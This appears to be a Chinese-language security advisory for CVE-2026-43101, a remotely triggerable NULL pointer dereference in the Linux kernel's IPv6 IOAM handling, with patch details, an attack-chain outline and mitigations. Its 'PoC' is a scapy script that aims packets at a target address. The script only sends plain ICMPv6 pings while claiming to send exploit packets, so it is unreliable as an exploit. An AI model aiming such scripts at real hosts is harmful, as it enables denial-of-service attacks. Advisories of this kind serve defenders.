CVE-2026-43101 CVSS 7.5 高危

CVE-2026-43101: Linux内核IPv6 IOAM空指针解引用漏洞

披露日期: 2026-05-06

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43101

漏洞类型

空指针解引用

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的IPv6 IOAM（带内OAM）模块存在一个空指针解引用漏洞。该漏洞位于`__ioam6_fill_trace_data`函数中，由于未对`__in6_dev_get()`的返回值进行NULL检查，以及使用了不当的设备获取函数，可能导致系统崩溃。攻击者无需认证即可通过网络利用此漏洞，造成拒绝服务攻击。该问题已在内核补丁中被修复，主要涉及增加必要的空值检查和使用RCU安全的设备访问函数。此漏洞影响Linux内核的IPv6数据包处理稳定性。

技术细节

该漏洞源于Linux内核网络栈的IPv6 IOAM实现代码。在`net/ipv6/ioam6.c`文件的`__ioam6_fill_trace_data`函数中，逻辑假设`__in6_dev_get()`总是返回有效的指针。然而，在某些竞态条件或特定网络拓扑下，该函数可能返回NULL。当后续代码尝试解引用此指针时，会触发内核态的空指针解引用异常，导致内核崩溃（Kernel Panic）。此外，原始代码使用了`skb_dst_dev()`，该函数在RCU（Read-Copy-Update）上下文中可能不是安全的。修复补丁将其替换为`skb_dst_dev_rcu()`以确保在并发环境下的安全性。同时，补丁增加了`READ_ONCE()`宏来防止编译器优化导致的读取不一致问题。由于该漏洞位于IPv6协议处理路径中，且无需用户交互和认证，远程攻击者可以通过发送特制的IPv6数据包触发该漏洞，从而造成目标主机系统不可用。

攻击链分析

STEP 1

发现

攻击者扫描目标网络，识别开启IPv6且运行受影响Linux内核版本的主机。

STEP 2

武器化

攻击者准备特制的IPv6数据包，旨在触发IOAM处理路径中的特定代码执行流。

STEP 3

交付

通过网络向目标主机发送恶意构造的IPv6数据包。

STEP 4

利用

目标内核处理数据包时，`__in6_dev_get()`返回NULL，`__ioam6_fill_trace_data`函数解引用该空指针。

STEP 5

影响

触发内核异常，导致系统崩溃或重启，造成拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-43101: Linux Kernel IPv6 IOAM NULL Pointer Dereference
# This script attempts to trigger the vulnerability by sending IPv6 packets.
# Note: Target kernel must be vulnerable and IOAM processing must be active.

from scapy.all import *
import sys

def send_exploit(target_ip):
    # Construct a basic IPv6 packet
    # In a real scenario, specific IOAM headers would be crafted to hit
    # the __ioam6_fill_trace_data path with a NULL device context.
    
    pkt = IPv6(dst=target_ip) / ICMPv6EchoRequest()
    
    print(f"[*] Sending packets to {target_ip} to trigger NULL dereference...")
    
    # Send multiple packets to attempt to hit the race condition
    for i in range(100):
        send(pkt, verbose=0)

    print("[+] Exploit packets sent.")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_ipv6>")
        sys.exit(1)
    send_exploit(sys.argv[1])

影响范围

Linux Kernel (Git commit 3719c234fa94c37c955b1ecd3742ef280ec135e6 之前版本)

防御指南

临时缓解措施

建议立即应用Linux内核官方提供的补丁（如提交3719c234fa94c37c955b1ecd3742ef280ec135e6）。在无法立即重启打补丁的情况下，可以通过网络防火墙规则阻断非必要的IPv6流量，或在内核编译时禁用CONFIG_IPV6_IOAM选项以规避风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表